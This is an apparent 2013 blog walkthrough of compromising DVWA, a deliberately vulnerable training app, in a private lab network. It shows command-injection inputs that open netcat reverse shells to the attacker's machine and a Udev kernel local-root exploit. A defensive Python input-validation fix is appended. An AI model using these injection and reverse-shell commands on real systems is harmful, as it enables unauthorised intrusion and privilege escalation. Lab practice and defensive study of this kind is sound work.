Posted by Security is just an illusion at Wednesday, March 13, 2013
Damn Vulnerable Web Application (DVWA)
Damn Vulnerable Web App (DVWA) is a PHP/MySQL web application that is damn vulnerable. Its main goals are to be an aid for security professionals to test their skills and tools in a legal environment, help web developers better understand the processes of securing web applications and aid teachers/students to teach/learn web application security in a classroom environment.
Goal = Get Root !!!
Start Armitage
netdiscover -r 192.168.228.0/24
ifconfig eth0 192.168.228.129
firefox 192.168.228.30
DVWA Login = admin / password
Security Level = Low
Vulnerability: Command Execution
Ping 0.0.0.0
0.0.0.0 && lc
0.0.0.0 && locate nc
0.0.0.0 && /bin/nc -e /bin/sh 192.168.228.129 4444
Start Netcat listener on port 4444
Get Netcat shell
id
uname -a
/pentest/exploits/exploitdb/
./searchsploit kernel 2.6
Use Linux Local Kernel 2.6 Udev < 141 Exploit
Upload Local Exploit
gcc 8572.c -o w00t
killall java // Armitage suckz on upload sometimes ... or my low machine ;)
cat 8572.c //Understand How the Exploit is Working
ps auxf | grep udev >> udev // Get Udev Pid
cat udev
Start 2nd Netcat reverse shell for local root exploit // port 666
echo '#!/bin/sh' > /tmp/run
echo '/bin/nc -e /bin/sh 192.168.228.129 666' >> /tmp/run
cat /tmp/run
./w00t 2676 //Start Exploit with Udev Pid -1
Get 2nd shell with root privileges
Have pfun ;)
With great power comes Great Responsibility !!!
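The Command Execution steps above succeed because the ping form passes the submitted string to a shell, where `&&` chains a second command. A defensive sketch of the fix, added here and not DVWA's own code: accept only a literal IPv4 address and run ping from an argument list with no shell. The function names are hypothetical, and the `ping -c 4 --` form assumes a Linux iputils-style ping.

```python
import ipaddress
import subprocess

# Constructed sample inputs: one normal target, then the strings that the
# walkthrough above submits to the ping form.
SAMPLES = [
    "192.168.228.30",
    "0.0.0.0 && locate nc",
    "0.0.0.0 && /bin/nc -e /bin/sh 192.168.228.129 4444",
]


def parse_target(raw):
    """Return an IPv4Address if raw is exactly one literal address, else None."""
    if not isinstance(raw, str) or len(raw) > 32:
        return None
    try:
        # IPv4Address() rejects spaces, shell metacharacters and host names alike.
        return ipaddress.IPv4Address(raw.strip())
    except ValueError:
        return None


def build_ping_argv(raw, count=4):
    """Build an argv list for ping, or None when the input is not an address."""
    addr = parse_target(raw)
    if addr is None:
        return None
    # Re-serialise the parsed value so only canonical text reaches the OS.
    # "--" ends option parsing; the list form means no shell ever sees the input.
    return ["ping", "-c", str(count), "--", str(addr)]


def safe_ping(raw, timeout=10):
    """Run ping without a shell; returns (accepted, output)."""
    argv = build_ping_argv(raw)
    if argv is None:
        return False, "rejected: not a literal IPv4 address"
    done = subprocess.run(argv, capture_output=True, text=True, timeout=timeout)
    return True, done.stdout


if __name__ == "__main__":
    for s in SAMPLES:
        print(repr(s), "->", build_ping_argv(s))
```

With this in place the `&&` inputs never reach a process at all, and a rejected request is also a clean signal to log and alert on.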